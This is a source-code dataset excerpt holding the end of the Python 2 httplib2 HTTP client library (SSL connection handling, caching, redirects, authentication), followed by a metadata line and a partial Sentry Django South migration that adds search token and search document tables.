ca_certs=None, disable_ssl_certificate_validation=False):
httplib.HTTPSConnection.__init__(self, host, port=port,
key_file=key_file,
cert_file=cert_file, strict=strict)
self.timeout = timeout
self.proxy_info = proxy_info
if ca_certs is None:
ca_certs = CA_CERTS
self.ca_certs = ca_certs
self.disable_ssl_certificate_validation = \
disable_ssl_certificate_validation
# The following two methods were adapted from https_wrapper.py, released
# with the Google Appengine SDK at
# http://googleappengine.googlecode.com/svn-history/r136/trunk/python/google/appengine/tools/https_wrapper.py
# under the following license:
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
def _GetValidHostsForCert(self, cert):
"""Returns a list of valid host globs for an SSL certificate.
Args:
cert: A dictionary representing an SSL certificate.
Returns:
list: A list of valid host globs.
"""
if 'subjectAltName' in cert:
return [x[1] for x in cert['subjectAltName']
if x[0].lower() == 'dns']
else:
return [x[0][1] for x in cert['subject']
if x[0][0].lower() == 'commonname']
def _ValidateCertificateHostname(self, cert, hostname):
"""Validates that a given hostname is valid for an SSL certificate.
Args:
cert: A dictionary representing an SSL certificate.
hostname: The hostname to test.
Returns:
bool: Whether or not the hostname is valid for this certificate.
"""
hosts = self._GetValidHostsForCert(cert)
for host in hosts:
host_re = host.replace('.', '\.').replace('*', '[^.]*')
if re.search('^%s$' % (host_re,), hostname, re.I):
return True
return False
def connect(self):
"Connect to a host on a given (SSL) port."
msg = "getaddrinfo returns an empty list"
if self.proxy_info and self.proxy_info.isgood():
use_proxy = True
proxy_type, proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass = self.proxy_info.astuple()
else:
use_proxy = False
if use_proxy and proxy_rdns:
host = proxy_host
port = proxy_port
else:
host = self.host
port = self.port
address_info = socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM)
for family, socktype, proto, canonname, sockaddr in address_info:
try:
if use_proxy:
sock = socks.socksocket(family, socktype, proto)
sock.setproxy(proxy_type, proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass)
else:
sock = socket.socket(family, socktype, proto)
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if has_timeout(self.timeout):
sock.settimeout(self.timeout)
sock.connect((self.host, self.port))
self.sock =_ssl_wrap_socket(
sock, self.key_file, self.cert_file,
self.disable_ssl_certificate_validation, self.ca_certs)
if self.debuglevel > 0:
print "connect: (%s, %s)" % (self.host, self.port)
if use_proxy:
print "proxy: %s" % str((proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass))
if not self.disable_ssl_certificate_validation:
cert = self.sock.getpeercert()
hostname = self.host.split(':', 0)[0]
if not self._ValidateCertificateHostname(cert, hostname):
raise CertificateHostnameMismatch(
'Server presented certificate that does not match '
'host %s: %s' % (hostname, cert), hostname, cert)
except ssl_SSLError, e:
if sock:
sock.close()
if self.sock:
self.sock.close()
self.sock = None
# Unfortunately the ssl module doesn't seem to provide any way
# to get at more detailed error information, in particular
# whether the error is due to certificate validation or
# something else (such as SSL protocol mismatch).
if e.errno == ssl.SSL_ERROR_SSL:
raise SSLHandshakeError(e)
else:
raise
except (socket.timeout, socket.gaierror):
raise
except socket.error, msg:
if self.debuglevel > 0:
print "connect fail: (%s, %s)" % (self.host, self.port)
if use_proxy:
print "proxy: %s" % str((proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass))
if self.sock:
self.sock.close()
self.sock = None
continue
break
if not self.sock:
raise socket.error, msg
SCHEME_TO_CONNECTION = {
'http': HTTPConnectionWithTimeout,
'https': HTTPSConnectionWithTimeout
}
# Use a different connection object for Google App Engine
try:
try:
from google.appengine.api import apiproxy_stub_map
if apiproxy_stub_map.apiproxy.GetStub('urlfetch') is None:
raise ImportError # Bail out; we're not actually running on App Engine.
from google.appengine.api.urlfetch import fetch
from google.appengine.api.urlfetch import InvalidURLError
except (ImportError, AttributeError):
from google3.apphosting.api import apiproxy_stub_map
if apiproxy_stub_map.apiproxy.GetStub('urlfetch') is None:
raise ImportError # Bail out; we're not actually running on App Engine.
from google3.apphosting.api.urlfetch import fetch
from google3.apphosting.api.urlfetch import InvalidURLError
def _new_fixed_fetch(validate_certificate):
def fixed_fetch(url, payload=None, method="GET", headers={},
allow_truncated=False, follow_redirects=True,
deadline=5):
return fetch(url, payload=payload, method=method, headers=headers,
allow_truncated=allow_truncated,
follow_redirects=follow_redirects, deadline=deadline,
validate_certificate=validate_certificate)
return fixed_fetch
class AppEngineHttpConnection(httplib.HTTPConnection):
"""Use httplib on App Engine, but compensate for its weirdness.
The parameters key_file, cert_file, proxy_info, ca_certs, and
disable_ssl_certificate_validation are all dropped on the ground.
"""
def __init__(self, host, port=None, key_file=None, cert_file=None,
strict=None, timeout=None, proxy_info=None, ca_certs=None,
disable_ssl_certificate_validation=False):
httplib.HTTPConnection.__init__(self, host, port=port,
strict=strict, timeout=timeout)
class AppEngineHttpsConnection(httplib.HTTPSConnection):
"""Same as AppEngineHttpConnection, but for HTTPS URIs."""
def __init__(self, host, port=None, key_file=None, cert_file=None,
strict=None, timeout=None, proxy_info=None, ca_certs=None,
disable_ssl_certificate_validation=False):
httplib.HTTPSConnection.__init__(self, host, port=port,
key_file=key_file,
cert_file=cert_file, strict=strict,
timeout=timeout)
self._fetch = _new_fixed_fetch(
not disable_ssl_certificate_validation)
# Update the connection classes to use the Googel App Engine specific ones.
SCHEME_TO_CONNECTION = {
'http': AppEngineHttpConnection,
'https': AppEngineHttpsConnection
}
except (ImportError, AttributeError):
pass
class Http(object):
"""An HTTP client that handles:
- all methods
- caching
- ETags
- compression,
- HTTPS
- Basic
- Digest
- WSSE
and more.
"""
def __init__(self, cache=None, timeout=None,
proxy_info=proxy_info_from_environment,
ca_certs=None, disable_ssl_certificate_validation=False):
"""If 'cache' is a string then it is used as a directory name for
a disk cache. Otherwise it must be an object that supports the
same interface as FileCache.
All timeouts are in seconds. If None is passed for timeout
then Python's default timeout for sockets will be used. See
for example the docs of socket.setdefaulttimeout():
http://docs.python.org/library/socket.html#socket.setdefaulttimeout
`proxy_info` may be:
- a callable that takes the http scheme ('http' or 'https') and
returns a ProxyInfo instance per request. By default, uses
proxy_nfo_from_environment.
- a ProxyInfo instance (static proxy config).
- None (proxy disabled).
ca_certs is the path of a file containing root CA certificates for SSL
server certificate validation. By default, a CA cert file bundled with
httplib2 is used.
If disable_ssl_certificate_validation is true, SSL cert validation will
not be performed.
"""
self.proxy_info = proxy_info
self.ca_certs = ca_certs
self.disable_ssl_certificate_validation = \
disable_ssl_certificate_validation
# Map domain name to an httplib connection
self.connections = {}
# The location of the cache, for now a directory
# where cached responses are held.
if cache and isinstance(cache, basestring):
self.cache = FileCache(cache)
else:
self.cache = cache
# Name/password
self.credentials = Credentials()
# Key/cert
self.certificates = KeyCerts()
# authorization objects
self.authorizations = []
# If set to False then no redirects are followed, even safe ones.
self.follow_redirects = True
# Which HTTP methods do we apply optimistic concurrency to, i.e.
# which methods get an "if-match:" etag header added to them.
self.optimistic_concurrency_methods = ["PUT", "PATCH"]
# If 'follow_redirects' is True, and this is set to True then
# all redirecs are followed, including unsafe ones.
self.follow_all_redirects = False
self.ignore_etag = False
self.force_exception_to_status_code = False
self.timeout = timeout
# Keep Authorization: headers on a redirect.
self.forward_authorization_headers = False
def __getstate__(self):
state_dict = copy.copy(self.__dict__)
# In case request is augmented by some foreign object such as
# credentials which handle auth
if 'request' in state_dict:
del state_dict['request']
if 'connections' in state_dict:
del state_dict['connections']
return state_dict
def __setstate__(self, state):
self.__dict__.update(state)
self.connections = {}
def _auth_from_challenge(self, host, request_uri, headers, response, content):
"""A generator that creates Authorization objects
that can be applied to requests.
"""
challenges = _parse_www_authenticate(response, 'www-authenticate')
for cred in self.credentials.iter(host):
for scheme in AUTH_SCHEME_ORDER:
if challenges.has_key(scheme):
yield AUTH_SCHEME_CLASSES[scheme](cred, host, request_uri, headers, response, content, self)
def add_credentials(self, name, password, domain=""):
"""Add a name and password that will be used
any time a request requires authentication."""
self.credentials.add(name, password, domain)
def add_certificate(self, key, cert, domain):
"""Add a key and cert that will be used
any time a request requires authentication."""
self.certificates.add(key, cert, domain)
def clear_credentials(self):
"""Remove all the names and passwords
that are used for authentication"""
self.credentials.clear()
self.authorizations = []
def _conn_request(self, conn, request_uri, method, body, headers):
for i in range(RETRIES):
try:
if hasattr(conn, 'sock') and conn.sock is None:
conn.connect()
conn.request(method, request_uri, body, headers)
except socket.timeout:
raise
except socket.gaierror:
conn.close()
raise ServerNotFoundError("Unable to find the server at %s" % conn.host)
except ssl_SSLError:
conn.close()
raise
except socket.error, e:
err = 0
if hasattr(e, 'args'):
err = getattr(e, 'args')[0]
else:
err = e.errno
if err == errno.ECONNREFUSED: # Connection refused
raise
except httplib.HTTPException:
# Just because the server closed the connection doesn't apparently mean
# that the server didn't send a response.
if hasattr(conn, 'sock') and conn.sock is None:
if i < RETRIES-1:
conn.close()
conn.connect()
continue
else:
conn.close()
raise
if i < RETRIES-1:
conn.close()
conn.connect()
continue
try:
response = conn.getresponse()
except (socket.error, httplib.HTTPException):
if i < RETRIES-1:
conn.close()
conn.connect()
continue
else:
conn.close()
raise
else:
content = ""
if method == "HEAD":
conn.close()
else:
content = response.read()
response = Response(response)
if method != "HEAD":
content = _decompressContent(response, content)
break
return (response, content)
def _request(self, conn, host, absolute_uri, request_uri, method, body, headers, redirections, cachekey):
"""Do the actual request using the connection object
and also follow one level of redirects if necessary"""
auths = [(auth.depth(request_uri), auth) for auth in self.authorizations if auth.inscope(host, request_uri)]
auth = auths and sorted(auths)[0][1] or None
if auth:
auth.request(method, request_uri, headers, body)
(response, content) = self._conn_request(conn, request_uri, method, body, headers)
if auth:
if auth.response(response, body):
auth.request(method, request_uri, headers, body)
(response, content) = self._conn_request(conn, request_uri, method, body, headers )
response._stale_digest = 1
if response.status == 401:
for authorization in self._auth_from_challenge(host, request_uri, headers, response, content):
authorization.request(method, request_uri, headers, body)
(response, content) = self._conn_request(conn, request_uri, method, body, headers, )
if response.status != 401:
self.authorizations.append(authorization)
authorization.response(response, body)
break
if (self.follow_all_redirects or (method in ["GET", "HEAD"]) or response.status == 303):
if self.follow_redirects and response.status in [300, 301, 302, 303, 307]:
# Pick out the location header and basically start from the beginning
# remembering first to strip the ETag header and decrement our 'depth'
if redirections:
if not response.has_key('location') and response.status != 300:
raise RedirectMissingLocation( _("Redirected but the response is missing a Location: header."), response, content)
# Fix-up relative redirects (which violate an RFC 2616 MUST)
if response.has_key('location'):
location = response['location']
(scheme, authority, path, query, fragment) = parse_uri(location)
if authority == None:
response['location'] = urlparse.urljoin(absolute_uri, location)
if response.status == 301 and method in ["GET", "HEAD"]:
response['-x-permanent-redirect-url'] = response['location']
if not response.has_key('content-location'):
response['content-location'] = absolute_uri
_updateCache(headers, response, content, self.cache, cachekey)
if headers.has_key('if-none-match'):
del headers['if-none-match']
if headers.has_key('if-modified-since'):
del headers['if-modified-since']
if 'authorization' in headers and not self.forward_authorization_headers:
del headers['authorization']
if response.has_key('location'):
location = response['location']
old_response = copy.deepcopy(response)
if not old_response.has_key('content-location'):
old_response['content-location'] = absolute_uri
redirect_method = method
if response.status in [302, 303]:
redirect_method = "GET"
body = None
(response, content) = self.request(location, redirect_method, body=body, headers = headers, redirections = redirections - 1)
response.previous = old_response
else:
raise RedirectLimit("Redirected more times than rediection_limit allows.", response, content)
elif response.status in [200, 203] and method in ["GET", "HEAD"]:
# Don't cache 206's since we aren't going to handle byte range requests
if not response.has_key('content-location'):
response['content-location'] = absolute_uri
_updateCache(headers, response, content, self.cache, cachekey)
return (response, content)
def _normalize_headers(self, headers):
return _normalize_headers(headers)
# Need to catch and rebrand some exceptions
# Then need to optionally turn all exceptions into status codes
# including all socket.* and httplib.* exceptions.
def request(self, uri, method="GET", body=None, headers=None, redirections=DEFAULT_MAX_REDIRECTS, connection_type=None):
""" Performs a single HTTP request.
The 'uri' is the URI of the HTTP resource and can begin with either
'http' or 'https'. The value of 'uri' must be an absolute URI.
The 'method' is the HTTP method to perform, such as GET, POST, DELETE,
etc. There is no restriction on the methods allowed.
The 'body' is the entity body to be sent with the request. It is a
string object.
Any extra headers that are to be sent with the request should be
provided in the 'headers' dictionary.
The maximum number of redirect to follow before raising an
exception is 'redirections. The default is 5.
The return value is a tuple of (response, content), the first
being and instance of the 'Response' class, the second being
a string that contains the response entity body.
"""
try:
if headers is None:
headers = {}
else:
headers = self._normalize_headers(headers)
if not headers.has_key('user-agent'):
headers['user-agent'] = "Python-httplib2/%s (gzip)" % __version__
uri = iri2uri(uri)
(scheme, authority, request_uri, defrag_uri) = urlnorm(uri)
domain_port = authority.split(":")[0:2]
if len(domain_port) == 2 and domain_port[1] == '443' and scheme == 'http':
scheme = 'https'
authority = domain_port[0]
proxy_info = self._get_proxy_info(scheme, authority)
conn_key = scheme+":"+authority
if conn_key in self.connections:
conn = self.connections[conn_key]
else:
if not connection_type:
connection_type = SCHEME_TO_CONNECTION[scheme]
certs = list(self.certificates.iter(authority))
if scheme == 'https':
if certs:
conn = self.connections[conn_key] = connection_type(
authority, key_file=certs[0][0],
cert_file=certs[0][1], timeout=self.timeout,
proxy_info=proxy_info,
ca_certs=self.ca_certs,
disable_ssl_certificate_validation=
self.disable_ssl_certificate_validation)
else:
conn = self.connections[conn_key] = connection_type(
authority, timeout=self.timeout,
proxy_info=proxy_info,
ca_certs=self.ca_certs,
disable_ssl_certificate_validation=
self.disable_ssl_certificate_validation)
else:
conn = self.connections[conn_key] = connection_type(
authority, timeout=self.timeout,
proxy_info=proxy_info)
conn.set_debuglevel(debuglevel)
if 'range' not in headers and 'accept-encoding' not in headers:
headers['accept-encoding'] = 'gzip, deflate'
info = email.Message.Message()
cached_value = None
if self.cache:
cachekey = defrag_uri
cached_value = self.cache.get(cachekey)
if cached_value:
# info = email.message_from_string(cached_value)
#
# Need to replace the line above with the kludge below
# to fix the non-existent bug not fixed in this
# bug report: http://mail.python.org/pipermail/python-bugs-list/2005-September/030289.html
try:
info, content = cached_value.split('\r\n\r\n', 1)
feedparser = email.FeedParser.FeedParser()
feedparser.feed(info)
info = feedparser.close()
feedparser._parse = None
except (IndexError, ValueError):
self.cache.delete(cachekey)
cachekey = None
cached_value = None
else:
cachekey = None
if method in self.optimistic_concurrency_methods and self.cache and info.has_key('etag') and not self.ignore_etag and 'if-match' not in headers:
# http://www.w3.org/1999/04/Editing/
headers['if-match'] = info['etag']
if method not in ["GET", "HEAD"] and self.cache and cachekey:
# RFC 2616 Section 13.10
self.cache.delete(cachekey)
# Check the vary header in the cache to see if this request
# matches what varies in the cache.
if method in ['GET', 'HEAD'] and 'vary' in info:
vary = info['vary']
vary_headers = vary.lower().replace(' ', '').split(',')
for header in vary_headers:
key = '-varied-%s' % header
value = info[key]
if headers.get(header, None) != value:
cached_value = None
break
if cached_value and method in ["GET", "HEAD"] and self.cache and 'range' not in headers:
if info.has_key('-x-permanent-redirect-url'):
# Should cached permanent redirects be counted in our redirection count? For now, yes.
if redirections <= 0:
raise RedirectLimit("Redirected more times than rediection_limit allows.", {}, "")
(response, new_content) = self.request(info['-x-permanent-redirect-url'], "GET", headers = headers, redirections = redirections - 1)
response.previous = Response(info)
response.previous.fromcache = True
else:
# Determine our course of action:
# Is the cached entry fresh or stale?
# Has the client requested a non-cached response?
#
# There seems to be three possible answers:
# 1. [FRESH] Return the cache entry w/o doing a GET
# 2. [STALE] Do the GET (but add in cache validators if available)
# 3. [TRANSPARENT] Do a GET w/o any cache validators (Cache-Control: no-cache) on the request
entry_disposition = _entry_disposition(info, headers)
if entry_disposition == "FRESH":
if not cached_value:
info['status'] = '504'
content = ""
response = Response(info)
if cached_value:
response.fromcache = True
return (response, content)
if entry_disposition == "STALE":
if info.has_key('etag') and not self.ignore_etag and not 'if-none-match' in headers:
headers['if-none-match'] = info['etag']
if info.has_key('last-modified') and not 'last-modified' in headers:
headers['if-modified-since'] = info['last-modified']
elif entry_disposition == "TRANSPARENT":
pass
(response, new_content) = self._request(conn, authority, uri, request_uri, method, body, headers, redirections, cachekey)
if response.status == 304 and method == "GET":
# Rewrite the cache entry with the new end-to-end headers
# Take all headers that are in response
# and overwrite their values in info.
# unless they are hop-by-hop, or are listed in the connection header.
for key in _get_end2end_headers(response):
info[key] = response[key]
merged_response = Response(info)
if hasattr(response, "_stale_digest"):
merged_response._stale_digest = response._stale_digest
_updateCache(headers, merged_response, content, self.cache, cachekey)
response = merged_response
response.status = 200
response.fromcache = True
elif response.status == 200:
content = new_content
else:
self.cache.delete(cachekey)
content = new_content
else:
cc = _parse_cache_control(headers)
if cc.has_key('only-if-cached'):
info['status'] = '504'
response = Response(info)
content = ""
else:
(response, content) = self._request(conn, authority, uri, request_uri, method, body, headers, redirections, cachekey)
except Exception, e:
if self.force_exception_to_status_code:
if isinstance(e, HttpLib2ErrorWithResponse):
response = e.response
content = e.content
response.status = 500
response.reason = str(e)
elif isinstance(e, socket.timeout):
content = "Request Timeout"
response = Response({
"content-type": "text/plain",
"status": "408",
"content-length": len(content)
})
response.reason = "Request Timeout"
else:
content = str(e)
response = Response({
"content-type": "text/plain",
"status": "400",
"content-length": len(content)
})
response.reason = "Bad Request"
else:
raise
return (response, content)
def _get_proxy_info(self, scheme, authority):
"""Return a ProxyInfo instance (or None) based on the scheme
and authority.
"""
hostname, port = urllib.splitport(authority)
proxy_info = self.proxy_info
if callable(proxy_info):
proxy_info = proxy_info(scheme)
if (hasattr(proxy_info, 'applies_to')
and not proxy_info.applies_to(hostname)):
proxy_info = None
return proxy_info
class Response(dict):
"""An object more like email.Message than httplib.HTTPResponse."""
"""Is this response from our local cache"""
fromcache = False
"""HTTP protocol version used by server. 10 for HTTP/1.0, 11 for HTTP/1.1. """
version = 11
"Status code returned by server. "
status = 200
"""Reason phrase returned by server."""
reason = "Ok"
previous = None
def __init__(self, info):
# info is either an email.Message or
# an httplib.HTTPResponse object.
if isinstance(info, httplib.HTTPResponse):
for key, value in info.getheaders():
self[key.lower()] = value
self.status = info.status
self['status'] = str(self.status)
self.reason = info.reason
self.version = info.version
elif isinstance(info, email.Message.Message):
for key, value in info.items():
self[key.lower()] = value
self.status = int(self['status'])
else:
for key, value in info.iteritems():
self[key.lower()] = value
self.status = int(self.get('status', self.status))
self.reason = self.get('reason', self.reason)
def __getattr__(self, name):
if name == 'dict':
return self
else:
raise AttributeError, name
| epl-1.0 |
wong2/sentry | src/sentry/migrations/0038_auto__add_searchtoken__add_unique_searchtoken_document_field_token__ad.py | 36 | 17201 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'SearchToken'
db.create_table('sentry_searchtoken', (
('id', self.gf('sentry.db.models.fields.bounded.BoundedBigAutoField')(primary_key=True)),
('document', self.gf('sentry.db.models.fields.FlexibleForeignKey')(related_name='token_set', to=orm['sentry.SearchDocument'])),
('field', self.gf('django.db.models.fields.CharField')(default='text', max_length=64)),
('token', self.gf('django.db.models.fields.CharField')(max_length=128)),
('times_seen', self.gf('django.db.models.fields.PositiveIntegerField')(default=1)),
))
db.send_create_signal('sentry', ['SearchToken'])
# Adding unique constraint on 'SearchToken', fields ['document', 'field', 'token']
db.create_unique('sentry_searchtoken', ['document_id', 'field', 'token'])
# Adding model 'SearchDocument'
db.create_table('sentry_searchdocument', (
('id', self.gf('sentry.db.models.fields.bounded.BoundedBigAutoField')(primary_key=True)),
('project', self.gf('sentry.db.models.fields.FlexibleForeignKey')(to=orm['sentry.Project'])),
('group', self.gf('sentry.db.models.fields.FlexibleForeignKey')(to=orm['sentry.Group'])),
('total_events', self.gf('django.db.models.fields.PositiveIntegerField')(default=1)),
('date_added', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
('date_changed', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
))
db.send_create_signal('sentry', ['SearchDocument'])
# Adding unique constraint on 'SearchDocument', fields ['project', 'group']
db.create_unique('sentry_searchdocument', ['project_id', 'group_id'])
def backwards(self, orm):
# Removing unique constraint on 'SearchDocument', fields ['project', 'group']
db.delete_unique('sentry_searchdocument', ['project_id', 'group_id'])
# Removing unique constraint on 'SearchToken', fields ['document', 'field', 'token']
db.delete_unique('sentry_searchtoken', ['document_id', 'field', 'token'])
# Deleting model 'SearchToken'
db.delete_table('sentry_searchtoken')
# Deleting model 'SearchDocument'
db.delete_table('sentry_searchdocument')
models = {
'sentry.user': {
'Meta': {'object_name': 'User', 'db_table': "'auth_user'"},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sentry.event': {
'Meta': {'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'time_spent': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'sentry.filtervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'FilterValue'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'logger', 'culprit', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'}),
'views': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.View']", 'symmetrical': 'False', 'blank': 'True'})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_bookmark_set'", 'to': "orm['sentry.User']"})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.messagecountbyminute': {
'Meta': {'unique_together': "(('project', 'group', 'date'),)", 'object_name': 'MessageCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.messagefiltervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'MessageFilterValue'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.messageindex': {
'Meta': {'unique_together': "(('column', 'value', 'object_id'),)", 'object_name': 'MessageIndex'},
'column': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.option': {
'Meta': {'object_name': 'Option'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.project': {
'Meta': {'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'owned_project_set'", 'null': 'True', 'to': "orm['sentry.User']"}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.projectdomain': {
'Meta': {'unique_together': "(('project', 'domain'),)", 'object_name': 'ProjectDomain'},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
